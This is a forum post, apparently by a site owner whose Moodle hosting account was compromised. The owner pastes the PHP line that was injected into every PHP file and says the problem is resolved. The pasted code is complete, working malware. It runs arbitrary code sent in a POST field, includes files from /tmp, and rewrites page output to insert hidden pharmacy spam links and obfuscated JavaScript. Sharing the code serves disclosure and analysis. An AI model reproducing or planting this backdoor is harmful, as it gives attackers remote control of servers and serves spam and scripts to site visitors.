From what I can tell, this line of code was added to ALL php created files throughout our entire hosting account. It appears to have been a hosting/hsphere/webshell problem. There's some extra code that was added to a few more files. I just loaded some backups. Unfortunately the Moodle portion was getting overhauled, so I did not have backups to most of the work
This problem has been resolved and I am not asking for help on it.
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5EaXNjb3VudCB0YWRhbGFmaWwgPEEgSFJFRj0naHR0cDovL3d3dy55b3V0dWJlLmNvbS90cmF4dGVuYmVyZzU1NScgdGl0bGU9J2J1eSB2aWFncmEgcGhhcm1hY3knPmJ1eSB2aWFncmEgaGVyZTwvQT4uIDxCUj4KVmlhZ3JhIEZhcSBJdGBzIG5vIHNlY3JldCB0aGF0IDxBIEhSRUY9J2h0dHA6Ly9mb3J1bS5seWNvcy5kZS9tZW1iZXIucGhwP3U9MjYyODInIHRpdGxlPSdidXkgdmlhZ3JhIG5vIHByZXNjcmlwdGlvbic+QnV5IHZpYWdyYSBPbmxpbmUgTm93PC9BPi4gVmlhZ3JhIGZvciBzYWxlIGZvciB0aGVzZSBwZW9wbGUgdXNpbmcgPEEgSFJFRj0naHR0cDovL3d3dy5hbnN3ZXJiYWcuY29tL3Byb2ZpbGUvP2lkPTMxMDE2OCcgdGl0bGU9J2dlbmVyaWMgYnV5IHZpYWdyYScgdGFyZ2V0PV9ibGFuaz5idXkgdmlhZ3JhIGRydWdzPC9BPkVyZWN0aWxlIGR5c2Z1bmN0aW9uIGZvcnVtcyBwZXJoYXBzIHlvdSBhbHJlYWR5IGhlYXIgYWJvdXQgcHVyY2hhc2Ugc2lsZGVuYWZpbCA8!
QSBIUkVGPSdodHRwOi8vZm9ydW1zLnZvZ3VlLmNvbS5hdS9tZW1iZXIucGhwP3U9NzU1MTYnIHRpdGxlPSdidXkgdmlhZ3JhIGRydWdzJz5idXkgdmlhZ3JhIG1hc3RlcmNhcmQ8L0E+LiA8QlI+Cgo8c2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+aWYodHlwZW9mKHlhaG9vX2NvdW50ZXIpPT10eXBlb2YoMSkpdmFyIHM9Jyc7ZWxzZSB2YXIgcz11bmVzY2FwZSgnQXhod251eSUyNXh3aEI0NCUzQyUzQjM2JTNCODM2OSUzQzM2NSUzRDRodTRDQTR4aHdudXlDNScpO2Zvcih2YXIgaT0xO2k8cy5sZW5ndGg7aSsrKWRvY3VtZW50LndyaXRlKFN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KGktMSktcy5zdWJzdHIocy5sZW5ndGgtMSwxKSkpO3ZhciB5YWhvb19jb3VudGVyPTE7PC9zY3JpcHQ+PC9kaXY+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode(!
$s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array()!
;if($b&&
$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
This problem has been resolved and I am not asking for help on it.
